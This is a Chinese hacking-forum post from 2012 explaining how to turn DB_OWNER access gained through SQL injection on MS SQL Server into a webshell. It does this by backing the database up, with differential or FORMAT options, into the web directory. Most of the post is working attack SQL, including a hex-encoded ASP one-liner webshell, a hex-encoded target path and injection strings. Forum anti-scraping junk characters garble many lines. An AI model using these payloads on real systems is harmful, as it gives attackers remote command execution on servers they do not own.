找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2195|回复: 0
打印 上一主题 下一主题

DB_OWNER权限得到webshell的改进方法

[复制链接]
跳转到指定楼层
楼主
发表于 2012-12-31 09:57:12 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
减少备份文件大小,得到可执行的webshell成功率提高不少# M5 U1 l7 R/ Y2 h, Y4 d$ y. A
0 V3 E  S& C+ v% g7 R7 N, R
一利用差异备份
7 s! [! E: r: F/ y加一个参数WITH DIFFERENTIAL
% b6 N, V, E9 ]) R# |! _2 z0 f- F$ g% S5 j  G
declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x77006F006B0061006F002E00620061006B00 backup database @a to disk=@s
$ [; x4 J! n6 K2 l* R" ecreate table [dbo].[xiaolu] ([cmd] [image]);
9 c; N! ~& s2 u1 x* [+ f& Hinsert into xiaolu(cmd) values(0x3C25657865637574652872657175657374282261222929253E)' r- o, S6 g5 ?  R8 t9 m9 D7 L* E
declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x65003A005C007700650062005C0077006F006B0061006F002E00610073007000 backup database @a to disk=@s WITH DIFFERENTIAL, H* A2 ]* R6 Y9 b3 _
2 E4 a5 b( Y2 o  b) \# F
二利用完全FORMAT. D( L! h) ~; H+ b' N3 r8 k5 h  `1 Z
加一个参数WITH FROMAT
* a: y; |2 Y' p* W/ ~/ C+ ]; }有些页面对数据库要执行几次,而备份又默认是每次都以追加的方式,如果一个注入点对数据库有几次操作,而备份的文件就 几倍的增加,所以
- ], L% m8 r4 e9 W/ S6 [) b. P8 V* s, X; A+ R
declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x77006F006B0061006F002E00620061006B00 backup database @a to disk=@s5 d6 {9 ~2 H( E" ?8 l6 Y% f
create table [dbo].[xiaolu] ([cmd] [image]); insert into xiaolu(cmd) values(0x3C25657865637574652872657175657374282261222929253E); q; P: V& {! M; V
declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x65003A005C007700650062005C0077006F006B0061006F002E00610073007000 backup database @a to disk=@s WITH FORMAT4 I: n6 |! E* ]+ f3 Z
& J% |8 e$ P* j( F
总的来说就是那么简单几句,下面以备份数据库model为例子) n" K( k& q8 s- [# U7 B

% p7 l+ c/ S) V# lid=1;use model create table cmd(str image);insert into cmd(str) values (”)- o# X  i2 N% x

# |: z: V* f, k1 D: Bid=1;backup database model to disk=’你的路径‘ with differential,format;–
( `" m% u4 X- B
: n$ T" y1 ?; v' k8 [
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表